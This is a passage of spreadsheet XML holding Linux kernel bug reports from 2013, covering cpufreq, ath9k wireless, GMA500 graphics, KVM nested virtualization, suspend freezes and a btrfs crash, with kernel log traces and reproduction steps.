CR2: 0000000000000062 [621700.283679] Kernel panic - not syncing: Fatal exception in interrupt [621700.287422] drm_kms_helper: panic occurred, switching back to text console</t>
  </si>
  <si>
    <t>related_cpus truncated with acpi-cpufreq driver on kernel 3.9.3</t>
  </si>
  <si>
    <t>3.9.3</t>
  </si>
  <si>
    <t>2013-05-24 14:22 UTC</t>
  </si>
  <si>
    <t>Jean-Philippe Halimi</t>
  </si>
  <si>
    <t>2013-06-28 07:38 UTC</t>
  </si>
  <si>
    <t>Created attachment 102441 [details] cpufreq-info trace Hello, I have just installed the 3.9.3 kernel on my Debian 7 installation. Linux 3.9.3-exa #7 SMP Fri May 24 11:12:58 CEST 2013 x86_64 GNU/Linux CPU Intel(R) Core(TM) i7-3770 CPU @ 3.40GHz (Ivy Bridge) Since then, the related_cpus file in /sys/devices/system/cpu/cpu*/cpufreq/related_cpus just returns the id of the current core: /sys/devices/system/cpu/cpu0/cpufreq/related_cpus contains 0 /sys/devices/system/cpu/cpu6/cpufreq/related_cpus contains 6 etc I read on an archive thread (http://lkml.indiana.edu/hypermail/linux/kernel/1303.3/00144.html) that this could happen when the new intel_pstate driver is activated, but I have deactivated it in the kernel options. I have attached my cpufreq-info trace which proves I am using the default acpi-cpufreq driver. Therefore, there must be some problem with related_cpus when using the acpi-cpufreq driver. Here is a listing of my files in /sys/devices/system/cpu/cpu0/cpufreq/: affected_cpus:0 bios_limit:3401000 cpuinfo_cur_freq:3401000 cpuinfo_max_freq:3401000 cpuinfo_min_freq:1600000 cpuinfo_transition_latency:10000 related_cpus:0 scaling_available_frequencies:3401000 3400000 3300000 3100000 3000000 2900000 2800000 2600000 2500000 2400000 2200000 2100000 2000000 1900000 1700000 1600000 scaling_available_governors:conservative userspace powersave ondemand performance scaling_cur_freq:3401000 scaling_driver:acpi-cpufreq scaling_governor:ondemand scaling_max_freq:3401000 scaling_min_freq:1600000 scaling_setspeed:&lt;unsupported&gt;</t>
  </si>
  <si>
    <t>ATH9K with gsm modem - HT AP is missing WMM params or HT capability/operation in AssocResp</t>
  </si>
  <si>
    <t>3.9.4</t>
  </si>
  <si>
    <t>2013-05-27 16:14 UTC</t>
  </si>
  <si>
    <t>manwe</t>
  </si>
  <si>
    <t>2013-10-15 16:03 UTC</t>
  </si>
  <si>
    <t>Created attachment 102681 [details] config I was redirected here after inspecting problem on Gentoo's Bugzilla (ticket #471344). I have "Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)" supported by ATH9K driver. After switching from 3.7.10 to 3.9.4 card is no longer able to connect to mobile gsm2wifi router. Other networks seem to work fine. Kernel config in attachment. Between 3.7.10 and 3.9.4 there were two commits affecting ATH9K dd5ee59bb005df38ca3ee00bc6ac349dc3370e4f and e1a0c6b3a4b27ed5f21291d0bbee2167ec201ef5 but only the first one was backported to 3.8 with commit ed359a3b7b6ade0071f378c0cf4392d252f7d334. So looks like it's caused by the second commit. Dmesg info: [ 17.208931] wlan0: authenticate with f0:84:c9:ed:f6:3e [ 17.227790] wlan0: send auth to f0:84:c9:ed:f6:3e (try 1/3) [ 17.227830] wlan0: deauthenticating from f0:84:c9:ed:f6:3e by local choice (reason=3) [ 18.360453] wlan0: authenticate with f0:84:c9:ed:f6:3e [ 18.385319] wlan0: send auth to f0:84:c9:ed:f6:3e (try 1/3) [ 18.486990] wlan0: send auth to f0:84:c9:ed:f6:3e (try 2/3) [ 18.489046] wlan0: authenticated [ 18.489945] wlan0: associate with f0:84:c9:ed:f6:3e (try 1/3) [ 18.492982] wlan0: RX AssocResp from f0:84:c9:ed:f6:3e (capab=0x431 status=0 aid=1) [ 18.492987] wlan0: HT AP is missing WMM params or HT capability/operation in AssocResp [ 23.385843] wlan0: authenticate with f0:84:c9:ed:f6:3e [ 23.404931] wlan0: send auth to f0:84:c9:ed:f6:3e (try 1/3) [ 23.404965] wlan0: deauthenticating from f0:84:c9:ed:f6:3e by local choice (reason=3) [ 24.536935] wlan0: authenticate with f0:84:c9:ed:f6:3e [ 24.562256] wlan0: send auth to f0:84:c9:ed:f6:3e (try 1/3) [ 24.564214] wlan0: authenticated [ 24.565428] wlan0: associate with f0:84:c9:ed:f6:3e (try 1/3) [ 24.568389] wlan0: RX AssocResp from f0:84:c9:ed:f6:3e (capab=0x431 status=0 aid=1) [ 24.568395] wlan0: HT AP is missing WMM params or HT capability/operation in AssocResp [ 29.565516] wlan0: authenticate with f0:84:c9:ed:f6:3e [ 29.584457] wlan0: send auth to f0:84:c9:ed:f6:3e (try 1/3) [ 29.584491] wlan0: deauthenticating from f0:84:c9:ed:f6:3e by local choice (reason=3) [ 30.716151] wlan0: authenticate with f0:84:c9:ed:f6:3e [ 30.741331] wlan0: send auth to f0:84:c9:ed:f6:3e (try 1/3) [ 30.842554] wlan0: send auth to f0:84:c9:ed:f6:3e (try 2/3) [ 30.844582] wlan0: authenticated [ 30.845691] wlan0: associate with f0:84:c9:ed:f6:3e (try 1/3) [ 30.848679] wlan0: RX AssocResp from f0:84:c9:ed:f6:3e (capab=0x431 status=0 aid=1) [ 30.848686] wlan0: HT AP is missing WMM params or HT capability/operation in AssocResp Post on Arch forum with the same problem: https://bbs.archlinux.org/viewtopic.php?pid=1277305 I hope this bug is clear enough, this is my first submit on kernel's bugzilla so sorry for any mistakes/missing things.</t>
  </si>
  <si>
    <t>gma500_gfx: Intel GMA600 tries to output to inaccessible MIPI display</t>
  </si>
  <si>
    <t>2013-05-28 14:40 UTC</t>
  </si>
  <si>
    <t>Kevin Becker</t>
  </si>
  <si>
    <t>2014-01-09 03:24 UTC</t>
  </si>
  <si>
    <t>Patrik Jakobsson</t>
  </si>
  <si>
    <t>I'm testing a Versalogic Falcon board ( http://www.versalogic.com/products/ds.asp?productid=230 ) that has Intel GMA600 graphics. This board has SVDO and LVDS display outputs, but only the LVDS output is accessible. When the gma500_gfx driver loads, I lose the LVDS display. I see the following message in dmesg: [drm] internal display is MIPI display This leads me to believe that the driver is trying to use the SVDO output. I found a similar issue on the LKML. This email thread included a patch that includes this board (ID 4108) in IS_MRST. It can be found at https://lkml.org/lkml/2012/6/12/175 . This patch fixes the issue for me. After loading the gma500_gfx driver with the patch, the LVDS display output stays on, I can load X using the modesetting driver and I now see the following in dmesg: [drm] internal display is LVDS display</t>
  </si>
  <si>
    <t>[nested virt] L2 Windows guest can't boot up ('-cpu host' to start L1)</t>
  </si>
  <si>
    <t>3.10.0-rc1</t>
  </si>
  <si>
    <t>2013-05-29 02:40 UTC</t>
  </si>
  <si>
    <t>2013-11-13 20:10 UTC</t>
  </si>
  <si>
    <t>Environment: ------------ Host OS (ia32/ia32e/IA64):ia32e Guest OS (ia32/ia32e/IA64):ia32e Guest OS Type (Linux/Windows): Windows kvm.git next branch Commit:db6ae6158186a17 qemu-kvm Commit:b5803aa3583e82e513 Host Kernel Version:3.9.0-rc3 Hardware:SandyBridge-EP Bug detailed description: -------------------------- In 'kvm on kvm' nested virtualization environment,if I start L1 with '-cpu host', a Windows (e.g. Win7) guest can't boot up as L2 guest. note: 1. when creating a linux guest as L2 guest, L2 guest boot up fine 2. if starting L1 with '-cpu qemu64,+vmx', L2 Windows can boot up. 3. this should be a kvm kernel bug: kvm next + qemu-kvm = result db6ae615 + b5803aa3 = bad 188424ba + b5803aa3 = good Reproduce steps: ---------------- 1.create L1 guests: qemu-system-x86_64 --enable-kvm -m 10240 -smp 8 -net nic,macaddr=00:12:45:67:2B:1C -net tap,script=/etc/kvm/qemu-ifup nested-kvm-rhel6u4.qcow -cpu host 2. create L2 guests: qemu-system-x86_64 -enable-kvm -m 1024 -smp 2 -net none win7.img Current result: ---------------- L2 guest (win7 guest) failed to boot up. Expected result: ---------------- L2 guest (win7 guest) boot up fine</t>
  </si>
  <si>
    <t>SMP x64 Windows 2003 guest can't boot up</t>
  </si>
  <si>
    <t>2013-05-29 03:06 UTC</t>
  </si>
  <si>
    <t>2013-07-01 08:46 UTC</t>
  </si>
  <si>
    <t>Environment: ------------ Host OS (ia32/ia32e/IA64):ia32e Guest OS (ia32/ia32e/IA64):ia32e Guest OS Type (Linux/Windows):Windows kvm.git next Commit:e47a5f5fb715b90b40747e9e235de557c6abd56c qemu-kvm Commit:b5803aa3583e82e5133f7621121bc15ee694f4a1 Host Kernel Version:3.10.0-rc1 Hardware: SandyBridge / IvyBridge Bug detailed description: -------------------------- SMP 64bit Windows 2003 can't boot up as a KVM guest. note: 1.win2k8/win7/win8/win2012/rhel6u4 guest can boot up fine 2.UP 64bit win2k3 guest (1 vCPU）can boot up fine. 3.32bit(PAE) win2k3 guest with 2 vCPUs can boot up fine. This should be a kvm kernel bug. kvm next + qemu-kvm = result f722406f + b5803aa3 = good e47a5f5f + b5803aa3 = bad Reproduce steps: ---------------- 1.start up a host with KVM enabled 2. qemu-system-x86_64 -enable-kvm -m 1024 -smp 2 -net none win2k3-x64.img Current result: ---------------- SMP 64bit win2k3 guest boot up fail Expected result: ---------------- SMP 64bit win2k3 guest boot up fine</t>
  </si>
  <si>
    <t>[nested virt] L2 has NMI error when creating L1 with "-cpu host" parameter.</t>
  </si>
  <si>
    <t>2013-05-29 03:22 UTC</t>
  </si>
  <si>
    <t>Environment: ------------ Host OS (ia32/ia32e/IA64):ia32e Guest OS (ia32/ia32e/IA64):ia32e Guest OS Type (Linux/Windows):Linux kvm.git next Commit:e47a5f5fb715b90b40747e9e235de557c6abd56c qemu-kvm Commit:b5803aa3583e82e5133f7621121bc15ee694f4a1 Host Kernel Version:3.10.0-rc1 Hardware: SandyBridge-EP, Haswell Bug detailed description: -------------------------- When starting L1 guest with parameter "-cpu host" (or '-cpu SandyBridge,+vmx', '-cpu Haswell,+vmx'), the L2 guest will print error like "NMI received for unknown reason 00 on CPU 1." note: When starting L1 guest with parameter "-cpu qemu64,+vmx", L2 guest won't print NMI error. Reproduce steps: ---------------- 1. create L1 guest: qemu-system-x86_64 --enable-kvm -m 10240 -smp 8 -net nic,macaddr=00:12:45:67:2B:1C -net tap,script=/etc/kvm/qemu-ifup nested-kvm-rhel6u4.qcow -cpu host 2. create L2 guest qemu-system-x86_64 --enable-kvm -m 1024 -smp 2 -net none rhel6u4.img Current result: ---------------- L2 guest continuously print NMI message Expected result: ---------------- L2 guest has no NMI message print； L2 works fine Basic root-causing log: ---------------------- [ in L2's 'dmesg'] Uhhuh. NMI received for unknown reason 30 on CPU 0. Do you have a strange power saving mode enabled? Dazed and confused, but trying to continue</t>
  </si>
  <si>
    <t>[PATCH 001/001] Compiling iwlwifi or alx against 3.4.47 kernel gives redefinition error</t>
  </si>
  <si>
    <t>3.4.47</t>
  </si>
  <si>
    <t>2013-05-30 20:11 UTC</t>
  </si>
  <si>
    <t>svrusso1</t>
  </si>
  <si>
    <t>File caching slowed down</t>
  </si>
  <si>
    <t>3.10.0-rc3-00170-g0f7dafd</t>
  </si>
  <si>
    <t>2013-06-01 23:42 UTC</t>
  </si>
  <si>
    <t>2013-11-13 20:04 UTC</t>
  </si>
  <si>
    <t>Created attachment 103221 [details] config for 3.10 rc3 Several hours after reboot latexing a 250 page tex-document slows down by 50%. The reason seems to be that file-caching does not work properly. This did not occur in 3.9. The command time latex mytexfile results consistently in something like real 0m2.015s user 0m1.948s sys 0m0.040s. and only every 10-th time in real 0m0.882s user 0m0.836s sys 0m0.028s which is still somewhat slower than shortly after reboot. I did not bisect this because I do not know how to make this happen immediately after reboot. This is a Thinkpad T510. The file system of my hard disk is ext4. I attach the config-file for 3.10.0-rc3-00170-g0f7dafd and also the config for my version of 3.9.4</t>
  </si>
  <si>
    <t>System hardlocks a few seconds after resuming</t>
  </si>
  <si>
    <t>3.9.3, 3.9.4</t>
  </si>
  <si>
    <t>2013-06-04 14:08 UTC</t>
  </si>
  <si>
    <t>Alexandre Pereira Nunes</t>
  </si>
  <si>
    <t>2013-06-11 12:30 UTC</t>
  </si>
  <si>
    <t>Created attachment 103311 [details] acipdump output Hi, Starting with 3.9.3 and up to (at least) 3.9.4, my laptop freezes (hard) after resuming from suspension (both suspend to ram / disk; I use suspend to ram more frequently, where the problem seems to be intermitent, on the other hand, on resuming from suspend to disk, the crash seems to happen like 9 in 10 times). ACPI suspend/resume seems to be a nightmare for me with varying results since forever on Linux, but on this particular laptop (Intel Sandybridge based), kernel 3.9.2 works like a charm (to be honest, I never had a machine where suspend and/or resume worked 100% of times, but with this kernel and below, crashing is very seldom, and this particular behaviour [succeed to resume but freeze later] is new to me). I'm using vanilla kernels, self-compiled with debian's gcc 4.7 or 4.8 (changing gcc versions didn't change the behavior). I'm attaching .config, /proc/cpuinfo and acpidump tables.</t>
  </si>
  <si>
    <t>Crash in btrfs_block_rsv_release+0x1f, test generic/311, looks like a use-after-free</t>
  </si>
  <si>
    <t>3.10-rc4+next</t>
  </si>
  <si>
    <t>2013-06-06 12:02 UTC</t>
  </si>
  <si>
    <t>13407.620299] bio: create slab &lt;bio-2&gt; at 2 [13407.715437] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 4 /dev/dm-0 [13407.728578] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 4 /dev/mapper/flakey-test [13407.732190] btrfs: disk space caching is enabled [13408.151253] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 4 /dev/dm-0 [13408.319167] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 4 /dev/dm-0 [13408.328779] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 4 /dev/mapper/flakey-test [13408.331827] btrfs: disk space caching is enabled [13408.378871] BTRFS debug (device dm-0): truncated 1 orphans [13408.593260] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 8 /dev/mapper/flakey-test [13408.596481] btrfs: disk space caching is enabled [13409.136976] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 8 /dev/dm-0 [13409.356974] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 8 /dev/dm-0 [13409.373494] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 8 /dev/mapper/flakey-test [13409.378208] btrfs: disk space caching is enabled [13409.445738] BTRFS debug (device dm-0): truncated 1 orphans [13409.706828] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 12 /dev/mapper/flakey-test [13409.711661] btrfs: disk space caching is enabled [13410.107368] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 12 /dev/dm-0 [13410.329348] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 12 /dev/dm-0 [13410.345859] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 12 /dev/mapper/flakey-test [13410.351514] btrfs: disk space caching is enabled [13410.395691] BTRFS debug (device dm-0): truncated 1 orphans [13410.619884] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 16 /dev/mapper/flakey-test [13410.622891] btrfs: disk space caching is enabled [13411.144203] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 16 /dev/dm-0 [13411.332329] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 16 /dev/dm-0 [13411.341950] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 16 /dev/mapper/flakey-test [13411.345067] btrfs: disk space caching is enabled [13411.395600] BTRFS debug (device dm-0): truncated 1 orphans [13411.640516] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 20 /dev/mapper/flakey-test [13411.643616] btrfs: disk space caching is enabled [13411.918982] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 21 /dev/dm-0 [13412.119836] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 21 /dev/dm-0 [13412.136161] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 21 /dev/mapper/flakey-test [13412.140879] btrfs: disk space caching is enabled [13412.421695] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 23 /dev/mapper/flakey-test [13412.425474] btrfs: disk space caching is enabled [13413.029913] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 23 /dev/dm-0 [13413.255655] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 23 /dev/dm-0 [13413.267976] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 23 /dev/mapper/flakey-test [13413.271124] btrfs: disk space caching is enabled [13413.312292] BTRFS debug (device dm-0): truncated 1 orphans [13413.679175] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 27 /dev/mapper/flakey-test [13413.682382] btrfs: disk space caching is enabled [13413.931508] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 27 /dev/dm-0 [13414.134832] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 27 /dev/dm-0 [13414.151350] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 27 /dev/mapper/flakey-test [13414.156141] btrfs: disk space caching is enabled [13414.203966] BTRFS debug (device dm-0): truncated 1 orphans [13414.524455] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 31 /dev/mapper/flakey-test [13414.529216] btrfs: disk space caching is enabled [13415.154869] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 31 /dev/dm-0 [13415.382176] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 31 /dev/dm-0 [13415.398928] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 31 /dev/mapper/flakey-test [13415.403664] btrfs: disk space caching is enabled [13415.445660] BTRFS debug (device dm-0): truncated 1 orphans [13415.804278] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 35 /dev/mapper/flakey-test [13415.807951] btrfs: disk space caching is enabled [13415.994739] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 35 /dev/dm-0 [13416.217307] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 35 /dev/dm-0 [13416.227916] device fsid ad8a2681-7467-4554-abfc-2d130def7a9d devid 1 transid 35 /dev/mapper/flakey-test [13416.230824] btrfs: disk space caching is enabled [13416.297803] BTRFS debug (device dm-0): run_one_delayed_ref returned -17 [13416.297810] ------------[ cut here ]------------ [13416.297834] WARNING: at fs/btrfs/super.c:253 __btrfs_abort_transaction+0xed/0x100 [btrfs]() [13416.297836] btrfs: Transaction aborted (error -17) [13416.297838] Modules linked in: dm_flakey rpcsec_gss_krb5 dm_crypt loop btrfs [13416.297849] CPU: 0 PID: 13047 Comm: mount Not tainted 3.10.0-rc4-default+ #312 [13416.297851] Hardware name: Intel Corporation Santa Rosa platform/Matanzas, BIOS TSRSCRB1.86C.0047.B00.0610170821 10/17/06 [13416.297854] ffffffffa00af00d ffff88007490f898 ffffffff81961bc0 ffff88007490f8d8 [13416.297860] ffffffff8104bef0 0000000000000086 00000000ffffffef ffff880072385000 [13416.297866] ffff88002c24c708 0000000000000a46 ffffffffa00ad7c0 ffff88007490f938 [13416.297872] Call Trace: [13416.297880] [&lt;ffffffff81961bc0&gt;] dump_stack+0x19/0x21 [13416.297887] [&lt;ffffffff8104bef0&gt;] warn_slowpath_common+0x70/0xa0 [13416.297891] [&lt;ffffffff8104bfd6&gt;] warn_slowpath_fmt+0x46/0x50 [13416.297905] [&lt;ffffffffa002177a&gt;] ? btrfs_run_delayed_refs+0x3fa/0x5a0 [btrfs] [13416.297915] [&lt;ffffffffa0005d8d&gt;] __btrfs_abort_transaction+0xed/0x100 [btrfs] [13416.297927] [&lt;ffffffffa002179c&gt;] btrfs_run_delayed_refs+0x41c/0x5a0 [btrfs] [13416.297941] [&lt;ffffffffa0032589&gt;] btrfs_commit_transaction+0x59/0xa20 [btrfs] [13416.297947] [&lt;ffffffff810acf5d&gt;] ? trace_hardirqs_on+0xd/0x10 [13416.297964] [&lt;ffffffffa00726cb&gt;] btrfs_recover_log_trees+0x3fb/0x4c0 [btrfs] [13416.297979] [&lt;ffffffffa0070da0&gt;] ? replay_one_extent+0x660/0x660 [btrfs] [13416.297994] [&lt;ffffffffa002f5dd&gt;] open_ctree+0x191d/0x20a0 [btrfs] [13416.298000] [&lt;ffffffff81396da9&gt;] ? string+0x49/0xe0 [13416.298010] [&lt;ffffffffa000579b&gt;] btrfs_mount+0x54b/0x800 [btrfs] [13416.298017] [&lt;ffffffff81150f58&gt;] ? cache_alloc_debugcheck_after+0xf8/0x210 [13416.298022] [&lt;ffffffff81162a70&gt;] mount_fs+0x20/0xe0 [13416.298027] [&lt;ffffffff8117d5a6&gt;] vfs_kern_mount+0x76/0x120 [13416.298031] [&lt;ffffffff8117fc5a&gt;] do_mount+0x27a/0x920 [13416.298035] [&lt;ffffffff8117f8f1&gt;] ? copy_mount_options+0xf1/0x190 [13416.298039] [&lt;ffffffff81180390&gt;] SyS_mount+0x90/0xe0 [13416.298045] [&lt;ffffffff8196fc02&gt;] system_call_fastpath+0x16/0x1b [13416.298048] ---[ end trace ad9afae7121407af ]--- [13416.298051] BTRFS error (device dm-0) in btrfs_run_delayed_refs:2630: errno=-17 Object already exists [13416.298058] BTRFS error (device dm-0) in open_ctree:2815: errno=-17 Object already exists (Failed to recover log tree) [13416.298455] BUG: sleeping function called from invalid context at mm/slab.c:3054 [13416.298459] in_atomic(): 1, irqs_disabled(): 0, pid: 13047, name: mount [13416.298461] 4 locks held by mount/13047: [13416.298464] #0: (&amp;type-&gt;s_umount_key#28/1){+.+.+.}, at: [&lt;ffffffff8116178c&gt;] sget+0x2cc/0x660 [13416.298475] #1: (&amp;fs_info-&gt;transaction_kthread_mutex){+.+...}, at: [&lt;ffffffffa002c41a&gt;] btrfs_cleanup_transaction+0x3a/0x680 [btrfs] [13416.298494] #2: (&amp;(&amp;cur_trans-&gt;delayed_refs.lock)-&gt;rlock){+.+...}, at: [&lt;ffffffffa002b9c0&gt;] btrfs_destroy_delayed_refs+0x170/0x370 [btrfs] [13416.298511] #3: (&amp;head_ref-&gt;mutex){+.+...}, at: [&lt;ffffffffa002b8c6&gt;] btrfs_destroy_delayed_refs+0x76/0x370 [btrfs] [13416.298529] CPU: 0 PID: 13047 Comm: mount Tainted: G W 3.10.0-rc4-default+ #312 [13416.298532] Hardware name: Intel Corporation Santa Rosa platform/Matanzas, BIOS TSRSCRB1.86C.0047.B00.0610170821 10/17/06 [13416.298534] 0000000000000850 ffff88007490f8f8 ffffffff81961bc0 ffff88007490f918 [13416.298541] ffffffff8107f335 ffff88007490f918 ffff88007e730680 ffff88007490f968 [13416.298546] ffffffff81152053 4232189000000001 ffffffff00000005 ffff88007490fa38 [13416.298552] Call Trace: [13416.298557] [&lt;ffffffff81961bc0&gt;] dump_stack+0x19/0x21 [13416.298563] [&lt;ffffffff8107f335&gt;] __might_sleep+0xe5/0x110 [13416.298567] [&lt;ffffffff81152053&gt;] kmem_cache_alloc+0x1f3/0x280 [13416.298583] [&lt;ffffffffa004d741&gt;] alloc_extent_state+0x21/0x130 [btrfs] [13416.298599] [&lt;ffffffffa004e7d5&gt;] __set_extent_bit+0x1c5/0x5c0 [btrfs] [13416.298615] [&lt;ffffffffa004f203&gt;] set_extent_bit+0x23/0x30 [btrfs] [13416.298631] [&lt;ffffffffa004f790&gt;] set_extent_dirty+0x20/0x30 [btrfs] [13416.298642] [&lt;ffffffffa00141ee&gt;] pin_down_extent+0xbe/0xe0 [btrfs] [13416.298655] [&lt;ffffffffa001c145&gt;] btrfs_pin_extent+0x55/0x80 [btrfs] [13416.298668] [&lt;ffffffffa002b8c6&gt;] ? btrfs_destroy_delayed_refs+0x76/0x370 [btrfs] [13416.298681] [&lt;ffffffffa002bab6&gt;] btrfs_destroy_delayed_refs+0x266/0x370 [btrfs] [13416.298695] [&lt;ffffffffa002c708&gt;] btrfs_cleanup_transaction+0x328/0x680 [btrfs] [13416.298708] [&lt;ffffffffa002d3a2&gt;] ? del_fs_roots+0xb2/0x130 [btrfs] [13416.298713] [&lt;ffffffff81084af0&gt;] ? try_to_wake_up+0x310/0x310 [13416.298727] [&lt;ffffffffa002f64e&gt;] open_ctree+0x198e/0x20a0 [btrfs] [13416.298731] [&lt;ffffffff81396da9&gt;] ? string+0x49/0xe0 [13416.298742] [&lt;ffffffffa000579b&gt;] btrfs_mount+0x54b/0x800 [btrfs] [13416.298747] [&lt;ffffffff81150f58&gt;] ? cache_alloc_debugcheck_after+0xf8/0x210 [13416.298752] [&lt;ffffffff81162a70&gt;] mount_fs+0x20/0xe0 [13416.298756] [&lt;ffffffff8117d5a6&gt;] vfs_kern_mount+0x76/0x120 [13416.298760] [&lt;ffffffff8117fc5a&gt;] do_mount+0x27a/0x920 [13416.298764] [&lt;ffffffff8117f8f1&gt;] ? copy_mount_options+0xf1/0x190 [13416.298769] [&lt;ffffffff81180390&gt;] SyS_mount+0x90/0xe0 [13416.298773] [&lt;ffffffff8196fc02&gt;] system_call_fastpath+0x16/0x1b [13416.299046] general protection fault: 0000 [#1] SMP [13416.302131] Modules linked in: dm_flakey rpcsec_gss_krb5 dm_crypt loop btrfs [13416.302131] CPU: 0 PID: 13047 Comm: mount Tainted: G W 3.10.0-rc4-default+ #312 [13416.302131] Hardware name: Intel Corporation Santa Rosa platform/Matanzas, BIOS TSRSCRB1.86C.0047.B00.0610170821 10/17/06 [13416.302131] task: ffff88006d869200 ti: ffff88007490e000 task.ti: ffff88007490e000 [13416.302131] RIP: 0010:[&lt;ffffffffa001b4bf&gt;] [&lt;ffffffffa001b4bf&gt;] btrfs_block_rsv_release+0x1f/0x60 [btrfs] [13416.302131] RSP: 0018:ffff88007490fac8 EFLAGS: 00010287 [13416.302131] RAX: 6b6b6b6b6b6b7063 RBX: ffff880055706000 RCX: 0000000000018000 [13416.302131] RDX: 6b6b6b6b6b6b6ec3 RSI: 6b6b6b6b6b6b7063 RDI: 6b6b6b6b6b6b6b6b [13416.302131] RBP: ffff88007490fac8 R08: 2222222222222222 R09: 2222222222222222 [13416.302131] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88002c1df098 [13416.302131] R13: 0000000000000000 R14: ffff88002c1df0e0 R15: 0000000000018000 [13416.302131] FS: 00007fb0b2ed77e0(0000) GS:ffff88007d800000(0000) knlGS:0000000000000000 [13416.302131] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [13416.302131] CR2: 00007fb0b3112000 CR3: 0000000070779000 CR4: 00000000000007f0 [13416.302131] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [13416.302131] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [13416.302131] Stack: [13416.302131] ffff88007490fb28 ffffffffa00863ea ffff880071e96450 ffff880052360080 [13416.456034] ffff88007490fb08 6b6b6b6b6b6b7063 ffff880052360080 ffff88002c1df098 [13416.456034] ffff88007490fb98 ffff880072385000 ffff880071e96450 ffff88007490fba8 [13416.456034] Call Trace: [13416.456034] [&lt;ffffffffa00863ea&gt;] __btrfs_kill_delayed_node+0x10a/0x1a0 [btrfs] [13416.456034] [&lt;ffffffffa008812b&gt;] btrfs_destroy_delayed_inodes+0x3b/0x60 [btrfs] [13416.456034] [&lt;ffffffffa002c78c&gt;] btrfs_cleanup_transaction+0x3ac/0x680 [btrfs] [13416.456034] [&lt;ffffffffa002d3a2&gt;] ? del_fs_roots+0xb2/0x130 [btrfs] [13416.456034] [&lt;ffffffff81084af0&gt;] ? try_to_wake_up+0x310/0x310 [13416.456034] [&lt;ffffffffa002f64e&gt;] open_ctree+0x198e/0x20a0 [btrfs] [13416.456034] [&lt;ffffffff81396da9&gt;] ? string+0x49/0xe0 [13416.456034] [&lt;ffffffffa000579b&gt;] btrfs_mount+0x54b/0x800 [btrfs] [13416.456034] [&lt;ffffffff81150f58&gt;] ? cache_alloc_debugcheck_after+0xf8/0x210 [13416.456034] [&lt;ffffffff81162a70&gt;] mount_fs+0x20/0xe0 [13416.456034] [&lt;ffffffff8117d5a6&gt;] vfs_kern_mount+0x76/0x120 [13416.456034] [&lt;ffffffff8117fc5a&gt;] do_mount+0x27a/0x920 [13416.456034] [&lt;ffffffff8117f8f1&gt;] ? copy_mount_options+0xf1/0x190 [13416.456034] [&lt;ffffffff81180390&gt;] SyS_mount+0x90/0xe0 [13416.456034] [&lt;ffffffff8196fc02&gt;] system_call_fastpath+0x16/0x1b [13416.456034] Code: f8 c9 c3 66 0f 1f 84 00 00 00 00 00 55 48 89 e5 66 66 66 66 90 48 8b bf e8 01 00 00 48 89 d1 48 8d 97 58 03 00 00 48 39 f2 74 29 &lt;66&gt; 83 bf b8 03 00 00 00 75 1f 48 8b 87 68 03 00 00 48 39 46 10 [13416.456034] RIP [&lt;ffffffffa001b4bf&gt;] btrfs_block_rsv_release+0x1f/0x60 [btrfs] [13416.456034] RSP &lt;ffff88007490fac8&gt; [13416.702142] ---[ end trace ad9afae7121407b0 ]--- See the RAX and RDX, slab poison. MKFS_OPTIONS -- -m single -d single --mixed /dev/sda9 MOUNT_OPTIONS -- -o enospc_debug,space_cache,noatime /dev/sda9 /mnt/a2</t>
  </si>
  <si>
    <t>ath9k: complete freeze on scanning</t>
  </si>
  <si>
    <t>3.9.4, modules backported from Linux version next-20130531</t>
  </si>
  <si>
    <t>2013-06-08 08:38 UTC</t>
  </si>
  <si>
    <t>Bertrand Marc</t>
  </si>
  <si>
    <t>Created attachment 103921 [details] Output of lspci -vvvxxxx Dear wireless network maintainers, I load the ath9k module and bring up the device but as soon as I try to scan for networks (iw dev wlan0 scan), the system completely freezes and I need to hard reboot. No magic sysrq key would work. I tried to get more information about the freeze with netconsole, but nothing came up.</t>
  </si>
  <si>
